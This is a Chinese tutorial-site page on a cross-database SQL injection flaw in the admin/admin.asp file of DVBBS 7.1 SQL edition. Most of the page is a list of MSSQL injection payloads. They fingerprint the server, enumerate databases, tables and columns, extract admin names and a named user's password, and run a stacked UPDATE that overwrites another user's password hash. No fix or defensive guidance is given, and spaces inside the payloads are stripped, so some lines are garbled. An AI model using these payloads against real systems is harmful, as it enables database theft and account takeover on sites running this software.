首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >实用技巧 >漏洞研究 >DVBBS7.1 SQL版 跨库漏洞
DVBBS7.1 SQL版 跨库漏洞
摘要:漏洞测试环境:DVBBS7.1SQL受影响文件admin/admin.asp.....漏洞利用(select@@version)>0获得Wi...

漏洞测试环境:DVBBS7.1SQL

受影响文件

admin/admin.asp

.....

漏洞利用

(select@@version)>0获得Windows的版本号

anduser_name()='dbo'判断当前系统的连接用户是不是sa

(selectuser_name())>0爆当前系统的连接用户

(selectdb_name())>0得到当前连接的数据库

(selectIS_MEMBER('db_owner'))--查询数据库当前用户权限

(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=7)---查询所有数据库名

(selecttop1namefromJxSoufun.dbo.sysobjectswherextype='U')--查询数据库表名

(selecttop1namefromJxSoufun.dbo.sysobjectswherextype='U'andnamenotin('web_Admin'))--查询数据库所有表名

(selectcount(*)fromJxSoufun.dbo.sysobjectswherextype='U'andname='web_Admin'anduid>(str(id)))--查询表名ID

(selecttop1namefromJxSoufun.dbo.syscolumnswhereid=1125579048)--查询字段名

(selecttop1namefromJxSoufun.dbo.syscolumnswhereid=1125579048andnamenotin('adminname'))--查询所有字段名

(selectcount(*)fromJxSoufun.dbo.web_AdminwhereAdminName>1)-查询用户

(selectcount(*)fromJxSoufun.dbo.web_AdminwhereAdminpwd>1andusername='bluefire')-查询用户bluefire密码

;updateJxSoufun.dbo.Agency_Usersetuserpwd='965eb72c92a549dd'whereusername='mthfc';--

【DVBBS7.1 SQL版 跨库漏洞】相关文章:

Debian灾难性漏洞

WordPress下载监控插件id参数SQL注入漏洞

BBSXP5.15最新漏洞精简版

如何对PHP程序中的常见漏洞进行攻击

MSIE DHTML Edit跨站脚本漏洞

教你利用Log备份获取Webshell

WDB论坛存在多个严重漏洞

UBB的跨站脚本攻击的漏洞

关于对SQL注入80004005 及其它错误消息分析

BBSXP5.15跨站攻击漏洞

上一篇: 教你利用Log备份获取Webshell
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
实用技巧子分类
最新漏洞研究学习
热门漏洞研究学习